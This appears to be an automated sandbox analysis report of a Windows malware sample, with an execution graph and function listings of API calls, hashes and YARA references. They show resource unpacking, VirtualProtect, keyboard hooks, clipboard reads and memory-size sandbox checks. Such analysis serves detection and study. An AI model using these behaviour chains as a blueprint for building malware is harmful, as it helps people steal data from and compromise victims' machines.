                                                                                              execution_graph 57329 2a492829 57331 2a492833 57329->57331 57330 2a492924 57331->57330 57337 2ab19dc2 57331->57337 57341 2ab19df8 57331->57341 57346 2ab19e08 57331->57346 57332 2a4928e9 57332->57330 57350 2ab1af40 57332->57350 57338 2ab19dce 57337->57338 57338->57332 57339 2ab1a02e 57338->57339 57340 2ab1a070 GlobalMemoryStatusEx 57338->57340 57339->57332 57340->57338 57342 2ab19daf 57341->57342 57343 2ab19dfb 57341->57343 57342->57332 57344 2ab1a02e 57343->57344 57345 2ab1a070 GlobalMemoryStatusEx 57343->57345 57344->57332 57345->57343 57347 2ab19e0c 57346->57347 57348 2ab1a02e 57347->57348 57349 2ab1a070 GlobalMemoryStatusEx 57347->57349 57348->57332 57349->57347 57351 2ab1aedb GlobalMemoryStatusEx 57350->57351 57353 2ab1af46 57350->57353 57352 2ab1aeee 57351->57352 57352->57330 57175 2ab1f3f0 57176 2ab1f3fd 57175->57176 57178 2ab1f47e 57176->57178 57179 2ab1f12c 57176->57179 57180 2ab1f137 57179->57180 57184 2afe0548 57180->57184 57190 2afe0533 57180->57190 57181 2ab1f6a7 57181->57178 57185 2afe0573 57184->57185 57196 2afe0ab0 57185->57196 57187 2afe0622 57191 2afe0548 57190->57191 57194 2afe0ab0 2 API calls 57191->57194 57192 2afe05f6 57193 2afe0622 57192->57193 57195 2afe1a30 2 API calls 57192->57195 57194->57192 57195->57193 57197 2afe05f6 57196->57197 57198 2afe0abf 57196->57198 57197->57187 57202 2afe1a30 57197->57202 57199 2afe0b6e 57198->57199 57206 2afe0c30 57198->57206 57211 2afe0c20 57198->57211 57216 2afe1a86 57202->57216 57220 2afe1a90 57202->57220 57207 2afe0c45 57206->57207 57208 2afe0e80 57207->57208 57209 2afe0fa8 GetModuleHandleW 57207->57209 57208->57199 57210 2afe0fd5 57209->57210 57210->57199 57213 2afe0c45 57211->57213 57212 2afe0e80 57212->57199 57213->57212 57214 2afe0fa8 GetModuleHandleW 57213->57214 57215 2afe0fd5 57214->57215 57215->57199 57217 2afe1af8 CreateWindowExW 57216->57217 57219 2afe1bb4 57217->57219 57221 2afe1af8 CreateWindowExW 57220->57221 57223 2afe1bb4 57221->57223 57354 24f10890 57355 24f108b1 57354->57355 57356 24f1097a 57355->57356 57359 24f131e3 57355->57359 57362 24f126d6 57355->57362 57365 24f19340 57359->57365 57364 24f19340 VirtualProtect 57362->57364 57363 24f126ec 57364->57363 57367 24f19353 57365->57367 57369 24f193f0 57367->57369 57370 24f19438 VirtualProtect 57369->57370 57372 24f131ff 57370->57372 57373 2afe5998 DuplicateHandle 57374 2afe5a2e 57373->57374 57224 2afe7570 57225 2afe75ca OleGetClipboard 57224->57225 57226 2afe760a 57225->57226 57375 2afe5750 57376 2afe5796 GetCurrentProcess 57375->57376 57378 2afe57e8 GetCurrentThread 57376->57378 57379 2afe57e1 57376->57379 57380 2afe581e 57378->57380 57381 2afe5825 GetCurrentProcess 57378->57381 57379->57378 57380->57381 57384 2afe585b 57381->57384 57382 2afe5883 GetCurrentThreadId 57383 2afe58b4 57382->57383 57384->57382 57385 40cbf7 57386 40cc08 57385->57386 57429 40d534 HeapCreate 57386->57429 57389 40cc46 57490 41087e 71 API calls 8 library calls 57389->57490 57392 40cc4c 57393 40cc50 57392->57393 57394 40cc58 __RTC_Initialize 57392->57394 57491 40cbb4 62 API calls 3 library calls 57393->57491 57431 411a15 67 API calls 3 library calls 57394->57431 57396 40cc57 57396->57394 57398 40cc66 57399 40cc72 GetCommandLineA 57398->57399 57400 40cc6a 57398->57400 57432 412892 71 API calls 3 library calls 57399->57432 57492 40e79a 62 API calls 3 library calls 57400->57492 57403 40cc71 57403->57399 57404 40cc82 57493 4127d7 107 API calls 3 library calls 57404->57493 57406 40cc8c 57407 40cc90 57406->57407 57408 40cc98 57406->57408 57494 40e79a 62 API calls 3 library calls 57407->57494 57433 41255f 106 API calls 6 library calls 57408->57433 57411 40cc97 57411->57408 57412 40cc9d 57413 40cca1 57412->57413 57414 40cca9 57412->57414 57495 40e79a 62 API calls 3 library calls 57413->57495 57434 40e859 73 API calls 5 library calls 57414->57434 57417 40ccb0 57419 40ccb5 57417->57419 57420 40ccbc 57417->57420 57418 40cca8 57418->57414 57496 40e79a 62 API calls 3 library calls 57419->57496 57435 4019f0 OleInitialize 57420->57435 57423 40ccbb 57423->57420 57424 40ccd8 57425 40ccea 57424->57425 57497 40ea0a 62 API calls _doexit 57424->57497 57498 40ea36 62 API calls _doexit 57425->57498 57428 40ccef _fseek 57430 40cc3a 57429->57430 57430->57389 57489 40cbb4 62 API calls 3 library calls 57430->57489 57431->57398 57432->57404 57433->57412 57434->57417 57436 401ab9 57435->57436 57499 40b99e 57436->57499 57438 401abf 57439 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 57438->57439 57466 402467 57438->57466 57440 401dc3 CloseHandle GetModuleHandleA 57439->57440 57447 401c55 57439->57447 57512 401650 57440->57512 57442 401e8b FindResourceA LoadResource LockResource SizeofResource 57514 40b84d 57442->57514 57446 401c9c CloseHandle 57446->57424 57447->57446 57452 401cf9 Module32Next 57447->57452 57448 401ecb _memset 57449 401efc SizeofResource 57448->57449 57450 401f1c 57449->57450 57451 401f5f 57449->57451 57450->57451 57570 401560 __VEC_memcpy __cftoe2_l 57450->57570 57453 401f92 _memset 57451->57453 57571 401560 __VEC_memcpy __cftoe2_l 57451->57571 57452->57440 57463 401d0f 57452->57463 57456 401fa2 FreeResource 57453->57456 57457 40b84d _malloc 62 API calls 57456->57457 57458 401fbb SizeofResource 57457->57458 57459 401fe5 _memset 57458->57459 57460 4020aa LoadLibraryA 57459->57460 57461 401650 57460->57461 57462 40216c GetProcAddress 57461->57462 57465 4021aa 57462->57465 57462->57466 57463->57446 57464 401dad Module32Next 57463->57464 57464->57440 57464->57463 57465->57466 57544 4018f0 57465->57544 57466->57424 57468 40243f 57468->57466 57572 40b6b5 62 API calls 2 library calls 57468->57572 57470 4021f1 57470->57468 57556 401870 57470->57556 57472 402269 VariantInit 57473 401870 75 API calls 57472->57473 57474 40228b VariantInit 57473->57474 57475 4022a7 57474->57475 57476 4022d9 SafeArrayCreate SafeArrayAccessData 57475->57476 57561 40b350 57476->57561 57479 40232c 57480 402354 SafeArrayDestroy 57479->57480 57488 40235b 57479->57488 57480->57488 57481 402392 SafeArrayCreateVector 57482 4023a4 57481->57482 57483 4023bc VariantClear VariantClear 57482->57483 57563 4019a0 57483->57563 57486 40242e 57487 4019a0 65 API calls 57486->57487 57487->57468 57488->57481 57489->57389 57490->57392 57491->57396 57492->57403 57493->57406 57494->57411 57495->57418 57496->57423 57497->57425 57498->57428 57500 40b9aa _fseek _strnlen 57499->57500 57501 40b9b8 57500->57501 57505 40b9ec 57500->57505 57573 40bfc1 62 API calls __getptd_noexit 57501->57573 57503 40b9bd 57574 40e744 6 API calls 2 library calls 57503->57574 57575 40d6e0 62 API calls 2 library calls 57505->57575 57507 40b9f3 57576 40b917 120 API calls 3 library calls 57507->57576 57509 40b9ff 57577 40ba18 LeaveCriticalSection _doexit 57509->57577 57510 40b9cd _fseek 57510->57438 57513 4017cc ___crtGetEnvironmentStringsA 57512->57513 57513->57442 57515 40b900 57514->57515 57516 40b85f 57514->57516 57585 40d2e3 6 API calls __decode_pointer 57515->57585 57523 40b8bc RtlAllocateHeap 57516->57523 57525 40b870 57516->57525 57526 40b8ec 57516->57526 57529 40b8f1 57516->57529 57531 401ebf 57516->57531 57581 40b7fe 62 API calls 4 library calls 57516->57581 57582 40d2e3 6 API calls __decode_pointer 57516->57582 57518 40b906 57586 40bfc1 62 API calls __getptd_noexit 57518->57586 57523->57516 57525->57516 57578 40ec4d 62 API calls 2 library calls 57525->57578 57579 40eaa2 62 API calls 7 library calls 57525->57579 57580 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 57525->57580 57583 40bfc1 62 API calls __getptd_noexit 57526->57583 57584 40bfc1 62 API calls __getptd_noexit 57529->57584 57532 40af66 57531->57532 57534 40af70 57532->57534 57533 40b84d _malloc 62 API calls 57533->57534 57534->57533 57535 40af8a 57534->57535 57538 40af8c std::bad_alloc::bad_alloc 57534->57538 57587 40d2e3 6 API calls __decode_pointer 57534->57587 57535->57448 57542 40afb2 57538->57542 57588 40d2bd 73 API calls __cinit 57538->57588 57539 40afbc 57590 40cd39 RaiseException 57539->57590 57589 40af49 62 API calls std::exception::exception 57542->57589 57543 40afca 57545 401903 lstrlenA 57544->57545 57546 4018fc 57544->57546 57591 4017e0 57545->57591 57546->57470 57549 401940 GetLastError 57551 40194b MultiByteToWideChar 57549->57551 57552 40198d 57549->57552 57550 401996 57550->57470 57553 4017e0 77 API calls 57551->57553 57552->57550 57607 401030 GetLastError EntryPoint 57552->57607 57554 401970 MultiByteToWideChar 57553->57554 57554->57552 57557 40af66 74 API calls 57556->57557 57558 40187c 57557->57558 57559 401885 SysAllocString 57558->57559 57560 4018a4 57558->57560 57559->57560 57560->57472 57562 40231a SafeArrayUnaccessData 57561->57562 57562->57479 57564 4019aa InterlockedDecrement 57563->57564 57569 4019df VariantClear 57563->57569 57565 4019b8 57564->57565 57564->57569 57566 4019c2 SysFreeString 57565->57566 57567 4019c9 57565->57567 57565->57569 57566->57567 57611 40aec0 63 API calls 2 library calls 57567->57611 57569->57486 57570->57450 57571->57453 57572->57466 57573->57503 57575->57507 57576->57509 57577->57510 57578->57525 57579->57525 57581->57516 57582->57516 57583->57529 57584->57531 57585->57518 57586->57531 57587->57534 57588->57542 57589->57539 57590->57543 57592 4017f3 57591->57592 57593 4017e9 EntryPoint 57591->57593 57594 401805 57592->57594 57595 4017fb EntryPoint 57592->57595 57593->57592 57596 401818 57594->57596 57597 40180e EntryPoint 57594->57597 57595->57594 57598 40183e 57596->57598 57605 401844 57596->57605 57608 40b783 72 API calls 4 library calls 57596->57608 57597->57596 57609 40b6b5 62 API calls 2 library calls 57598->57609 57602 40182d 57602->57605 57606 401834 EntryPoint 57602->57606 57603 40186d MultiByteToWideChar 57603->57549 57603->57550 57604 40184e EntryPoint 57604->57605 57605->57603 57605->57604 57610 40b743 62 API calls 2 library calls 57605->57610 57606->57598 57608->57602 57609->57605 57610->57605 57611->57569 57612 2a492630 57613 2a492676 DeleteFileW 57612->57613 57615 2a4926af 57613->57615 57616 24f19848 57618 24f1984e 57616->57618 57617 24f1991b 57618->57617 57621 2afe97c0 57618->57621 57625 2afe97b0 57618->57625 57622 2afe97cf 57621->57622 57629 2afe8144 57622->57629 57626 2afe97c0 57625->57626 57627 2afe8144 5 API calls 57626->57627 57628 2afe97ef 57627->57628 57628->57618 57631 2afe814f 57629->57631 57633 2afe81ec 57631->57633 57632 2afe98b5 57634 2afe81f7 57633->57634 57635 2afe9f09 57634->57635 57639 2afeaec8 57634->57639 57644 2afeae41 57634->57644 57650 2afeae80 57634->57650 57635->57632 57640 2afeaee9 57639->57640 57641 2afeaf0d 57640->57641 57656 2afeb078 57640->57656 57660 2afeb068 57640->57660 57641->57635 57645 2afeae4a 57644->57645 57646 2afeae89 57644->57646 57645->57635 57647 2afeae8f 57646->57647 57648 2afeb078 5 API calls 57646->57648 57649 2afeb068 5 API calls 57646->57649 57647->57635 57648->57647 57649->57647 57651 2afeae8f 57650->57651 57653 2afeae99 57650->57653 57651->57635 57652 2afeaeaf 57652->57635 57653->57652 57654 2afeb078 5 API calls 57653->57654 57655 2afeb068 5 API calls 57653->57655 57654->57652 57655->57652 57658 2afeb085 57656->57658 57657 2afeb0be 57657->57641 57658->57657 57664 2afe9ca4 57658->57664 57661 2afeb079 57660->57661 57662 2afeb0be 57661->57662 57663 2afe9ca4 5 API calls 57661->57663 57662->57641 57663->57662 57665 2afe9caf 57664->57665 57667 2afeb130 57665->57667 57668 2afe9cd8 57665->57668 57667->57667 57669 2afe9ce3 57668->57669 57675 2afeb180 57669->57675 57671 2afeb59f 57679 2afefcc0 57671->57679 57687 2afefca8 57671->57687 57672 2afeb5d9 57672->57667 57678 2afeb18b 57675->57678 57676 2afec378 57676->57671 57677 2afeaec8 5 API calls 57677->57676 57678->57676 57678->57677 57680 2afefcc6 57679->57680 57682 2afefcfd 57680->57682 57695 2afeff38 57680->57695 57699 2afeff28 57680->57699 57681 2afefd3d 57685 2afe0548 4 API calls 57681->57685 57686 2afe0533 4 API calls 57681->57686 57682->57672 57685->57682 57686->57682 57688 2afefcb3 57687->57688 57690 2afefcfd 57688->57690 57691 2afeff38 3 API calls 57688->57691 57692 2afeff28 3 API calls 57688->57692 57689 2afefd3d 57693 2afe0548 4 API calls 57689->57693 57694 2afe0533 4 API calls 57689->57694 57690->57672 57691->57689 57692->57689 57693->57690 57694->57690 57704 2b1e0438 57695->57704 57713 2b1e0448 57695->57713 57696 2afeff42 57696->57681 57700 2afeff37 57699->57700 57701 2afeff41 57699->57701 57702 2b1e0438 3 API calls 57700->57702 57703 2b1e0448 3 API calls 57700->57703 57701->57681 57702->57701 57703->57701 57705 2b1e043b 57704->57705 57707 2b1e0474 57705->57707 57708 2afe0f5a GetModuleHandleW 57705->57708 57709 2afe0c30 GetModuleHandleW 57705->57709 57710 2afe0c20 GetModuleHandleW 57705->57710 57706 2b1e0464 57706->57707 57711 2b1e0438 GetModuleHandleW GetModuleHandleW GetModuleHandleW 57706->57711 57712 2b1e0448 GetModuleHandleW GetModuleHandleW GetModuleHandleW 57706->57712 57707->57696 57708->57706 57709->57706 57710->57706 57711->57707 57712->57707 57714 2b1e044e 57713->57714 57716 2b1e0474 57714->57716 57719 2afe0f5a GetModuleHandleW 57714->57719 57720 2afe0c30 GetModuleHandleW 57714->57720 57721 2afe0c20 GetModuleHandleW 57714->57721 57715 2b1e0464 57715->57716 57717 2b1e0438 GetModuleHandleW GetModuleHandleW GetModuleHandleW 57715->57717 57718 2b1e0448 GetModuleHandleW GetModuleHandleW GetModuleHandleW 57715->57718 57716->57696 57717->57716 57718->57716 57719->57715 57720->57715 57721->57715 57722 24f195c8 57723 24f19608 CloseHandle 57722->57723 57725 24f19639 57723->57725 57227 24ebd030 57228 24ebd048 57227->57228 57229 24ebd0a2 57228->57229 57234 2afe65a0 57228->57234 57245 2afe1c38 57228->57245 57250 2afe1c48 57228->57250 57255 2afe6590 57228->57255 57237 2afe65cd 57234->57237 57235 2afe6601 57290 2afe555c 57235->57290 57237->57235 57238 2afe65f1 57237->57238 57266 2b1e0bea 57238->57266 57271 2b1e0cc4 57238->57271 57277 2b1e0bf8 57238->57277 57282 2afe6718 57238->57282 57286 2afe6728 57238->57286 57239 2afe65ff 57246 2afe1c48 57245->57246 57248 2afe65a0 3 API calls 57246->57248 57249 2afe6590 3 API calls 57246->57249 57247 2afe1c8f 57247->57229 57248->57247 57249->57247 57251 2afe1c6e 57250->57251 57253 2afe65a0 3 API calls 57251->57253 57254 2afe6590 3 API calls 57251->57254 57252 2afe1c8f 57252->57229 57253->57252 57254->57252 57258 2afe6595 57255->57258 57256 2afe6601 57257 2afe555c CallWindowProcW 57256->57257 57260 2afe65ff 57257->57260 57258->57256 57259 2afe65f1 57258->57259 57261 2b1e0bea 3 API calls 57259->57261 57262 2afe6728 CallWindowProcW 57259->57262 57263 2afe6718 CallWindowProcW 57259->57263 57264 2b1e0bf8 3 API calls 57259->57264 57265 2b1e0cc4 3 API calls 57259->57265 57261->57260 57262->57260 57263->57260 57264->57260 57265->57260 57267 2b1e0bf3 57266->57267 57294 2b1e0c9f 57267->57294 57298 2b1e0cb0 57267->57298 57268 2b1e0c98 57268->57239 57272 2b1e0c82 57271->57272 57273 2b1e0cd2 57271->57273 57275 2b1e0c9f 3 API calls 57272->57275 57276 2b1e0cb0 3 API calls 57272->57276 57274 2b1e0c98 57274->57239 57275->57274 57276->57274 57279 2b1e0bfe 57277->57279 57278 2b1e0c98 57278->57239 57280 2b1e0c9f 3 API calls 57279->57280 57281 2b1e0cb0 3 API calls 57279->57281 57280->57278 57281->57278 57284 2afe6736 57282->57284 57283 2afe555c CallWindowProcW 57283->57284 57284->57283 57285 2afe680e 57284->57285 57285->57239 57288 2afe6736 57286->57288 57287 2afe555c CallWindowProcW 57287->57288 57288->57287 57289 2afe680e 57288->57289 57289->57239 57291 2afe5567 57290->57291 57292 2afe68c2 CallWindowProcW 57291->57292 57293 2afe6871 57291->57293 57292->57293 57293->57239 57295 2b1e0ca3 57294->57295 57296 2b1e0cc1 57295->57296 57302 2b1e1e72 57295->57302 57296->57268 57299 2b1e0cb6 57298->57299 57300 2b1e0cc1 57299->57300 57301 2b1e1e72 3 API calls 57299->57301 57300->57268 57301->57300 57303 2b1e1e0a 57302->57303 57304 2b1e1e7a 57302->57304 57303->57296 57307 2afe555c CallWindowProcW 57304->57307 57309 2afe552f 57304->57309 57313 2afe6818 57304->57313 57305 2b1e1e8a 57305->57296 57307->57305 57310 2afe553a 57309->57310 57311 2afe68c2 CallWindowProcW 57310->57311 57312 2afe6871 57310->57312 57311->57312 57312->57305 57314 2afe6828 57313->57314 57315 2afe68c2 CallWindowProcW 57314->57315 57316 2afe6871 57314->57316 57315->57316 57316->57305 57317 2afe8f60 57318 2afe8fa4 SetWindowsHookExA 57317->57318 57320 2afe8fea 57318->57320 57321 2afe6b20 57322 2afe6b28 57321->57322 57324 2afe6b4b 57322->57324 57325 2afe55b4 57322->57325 57326 2afe6b60 KiUserCallbackDispatcher 57325->57326 57328 2afe6bce 57326->57328 57328->57322

                                                                                              Executed Functions

                                                                                              Function 2AFE0C30 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 298COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1738 2afe0c30-2afe0c56 1741 2afe0c58-2afe0c6d 1738->1741 1742 2afe0c86-2afe0c8e 1738->1742 1748 2afe0c74-2afe0c80 1741->1748 1743 2afe0cd4-2afe0d0e 1742->1743 1744 2afe0c90 1742->1744 1758 2afe0eb9-2afe0eeb 1743->1758 1759 2afe0d14-2afe0d5f 1743->1759 1746 2afe0c9a-2afe0ccf 1744->1746 1755 2afe0d62-2afe0dc4 1746->1755 1748->1742 1749 2afe0e8c-2afe0eb2 1748->1749 1749->1758 1782 2afe0dca-2afe0dd7 1755->1782 1783 2afe0e80-2afe0e8b 1755->1783 1774 2afe0ef2-2afe0fa0 1758->1774 1759->1755 1785 2afe0fa8-2afe0fd3 GetModuleHandleW 1774->1785 1786 2afe0fa2-2afe0fa5 1774->1786 1790 2afe0e7c-2afe0e7e 1782->1790 1791 2afe0ddd-2afe0e0a 1782->1791 1788 2afe0fdc-2afe0ff0 1785->1788 1789 2afe0fd5-2afe0fdb 1785->1789 1786->1785 1789->1788 1790->1774 1790->1783 1791->1790 1797 2afe0e0c-2afe0e19 1791->1797 1797->1790 1798 2afe0e1b-2afe0e32 1797->1798 1801 2afe0e3f-2afe0e6e 1798->1801 1802 2afe0e34-2afe0e3d 1798->1802 1801->1790 1808 2afe0e70-2afe0e7a 1801->1808 1802->1790 1808->1790 1808->1801
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 2AFE0FC6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID: Q
                                                                                              • API String ID: 4139908857-3463352047
                                                                                              • Opcode ID: a3b976963ed77dd6b7fc65be52ab0d72c8ee5e56c5f9fdbda49c092aefd92d30
                                                                                              • Instruction ID: 51cf0efe1861a46b432e7e97673cf670d33676ebc8acc45e9db9d97db9ef2821
                                                                                              • Opcode Fuzzy Hash: a3b976963ed77dd6b7fc65be52ab0d72c8ee5e56c5f9fdbda49c092aefd92d30
                                                                                              • Instruction Fuzzy Hash: CAB1AC70A007459FCB04EF79D48096EBBF6FF88300B14896AD84ADB756DB78E945CB90
                                                                                              Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                              • _getenv.LIBCMT ref: 00401ABA
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                              • Module32First.KERNEL32 ref: 00401C48
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                              • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                              • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                              • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                              • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                              • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                              • _malloc.LIBCMT ref: 00401EBA
                                                                                              • _memset.LIBCMT ref: 00401EDD
                                                                                              • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                              • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                              • API String ID: 1430744539-2962942730
                                                                                              • Opcode ID: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                              • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                              • Opcode Fuzzy Hash: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                              • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                              Function 0040CBF7 Relevance: 21.1, APIs: 14, Instructions: 78COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
                                                                                              • String ID:
                                                                                              • API String ID: 2598563909-0
                                                                                              • Opcode ID: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                              • Instruction ID: 67c2b95978a5c3de314e94e7eee78366e8702871eb07600154e5c77a41a3d030
                                                                                              • Opcode Fuzzy Hash: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                              • Instruction Fuzzy Hash: 5321E770A05304DAFB207BB3E98676932B46F00309F00453FE508B62D2EB7C89918A5C
                                                                                              Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                              • GetLastError.KERNEL32 ref: 00401940
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 3322701435-0
                                                                                              • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                              • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                              • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                              • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                              Function 2AFE5742 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 898 2afe5742-2afe57df GetCurrentProcess 902 2afe57e8-2afe581c GetCurrentThread 898->902 903 2afe57e1-2afe57e7 898->903 904 2afe581e-2afe5824 902->904 905 2afe5825-2afe5859 GetCurrentProcess 902->905 903->902 904->905 906 2afe585b-2afe5861 905->906 907 2afe5862-2afe587d call 2afe5922 905->907 906->907 911 2afe5883-2afe58b2 GetCurrentThreadId 907->911 912 2afe58bb-2afe591d 911->912 913 2afe58b4-2afe58ba 911->913 913->912
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 2AFE57CE
                                                                                              • GetCurrentThread.KERNEL32 ref: 2AFE580B
                                                                                              • GetCurrentProcess.KERNEL32 ref: 2AFE5848
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 2AFE58A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: dc8c464fc02b001dee373a3e08f22c43c15f9b61557ab6d5df33d76f67a27fc0
                                                                                              • Instruction ID: 1f380c47c72f1b27e76c8b839daa88599ccb3de040190d38e58d3215b9de7f95
                                                                                              • Opcode Fuzzy Hash: dc8c464fc02b001dee373a3e08f22c43c15f9b61557ab6d5df33d76f67a27fc0
                                                                                              • Instruction Fuzzy Hash: 0C5168B09013498FDB44DFA9C688BDEBFF1EF89300F248559D459A72A0D778A980CF65
                                                                                              Function 2AFE5750 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 920 2afe5750-2afe57df GetCurrentProcess 924 2afe57e8-2afe581c GetCurrentThread 920->924 925 2afe57e1-2afe57e7 920->925 926 2afe581e-2afe5824 924->926 927 2afe5825-2afe5859 GetCurrentProcess 924->927 925->924 926->927 928 2afe585b-2afe5861 927->928 929 2afe5862-2afe587d call 2afe5922 927->929 928->929 933 2afe5883-2afe58b2 GetCurrentThreadId 929->933 934 2afe58bb-2afe591d 933->934 935 2afe58b4-2afe58ba 933->935 935->934
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 2AFE57CE
                                                                                              • GetCurrentThread.KERNEL32 ref: 2AFE580B
                                                                                              • GetCurrentProcess.KERNEL32 ref: 2AFE5848
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 2AFE58A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: 9fd00cf4669e5a62901a32fc4707d19b35ecb56ffd9bb919f5caf9e88da555c5
